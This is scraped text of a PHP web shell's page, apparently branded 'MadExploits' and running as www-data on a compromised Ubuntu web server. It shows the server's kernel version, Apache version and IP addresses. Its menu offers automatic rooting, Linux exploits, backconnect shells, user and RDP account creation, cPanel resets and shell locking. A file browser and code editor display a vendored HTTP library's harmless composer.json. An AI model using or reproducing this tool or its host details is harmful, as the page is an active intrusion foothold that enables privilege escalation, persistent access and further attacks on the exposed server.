Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.145.28.3
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
kriswallsmith /
buzz /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
.gitattributes
384
B
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
composer.json
1.4
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "kriswallsmith/buzz", "description": "Lightweight HTTP client", "keywords": ["http client", "curl"], "homepage": "https://github.com/kriswallsmith/Buzz", "type": "library", "license": "MIT", "authors": [ { "name": "Kris Wallsmith", "email": "kris.wallsmith@gmail.com", "homepage": "https://kriswallsmith.net/" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://tnyholm.se/" } ], "require": { "php": "^7.1 || ^8.0", "psr/http-message": "^1.0", "psr/http-client": "^1.0", "php-http/httplug": "^1.1 || ^2.0", "symfony/options-resolver": "^3.4 || ^4.0 || ^5.0", "psr/http-factory": "^1.0" }, "require-dev": { "php-http/client-integration-tests": "^3.0", "nyholm/psr7": "^1.0", "psr/log": "^1.0", "phpunit/phpunit": "^7.5 || ^9.4" }, "provide": { "php-http/client-implementation": "1.0", "psr/http-client-implementation": "1.0" }, "suggest": { "ext-curl": "To use our cUrl clients", "nyholm/psr7": "For PSR-7 and PSR-17 implementation" }, "autoload": { "psr-4": { "Buzz\\": "lib" } }, "autoload-dev": { "psr-4": { "Buzz\\Test\\": "tests" } } }
Close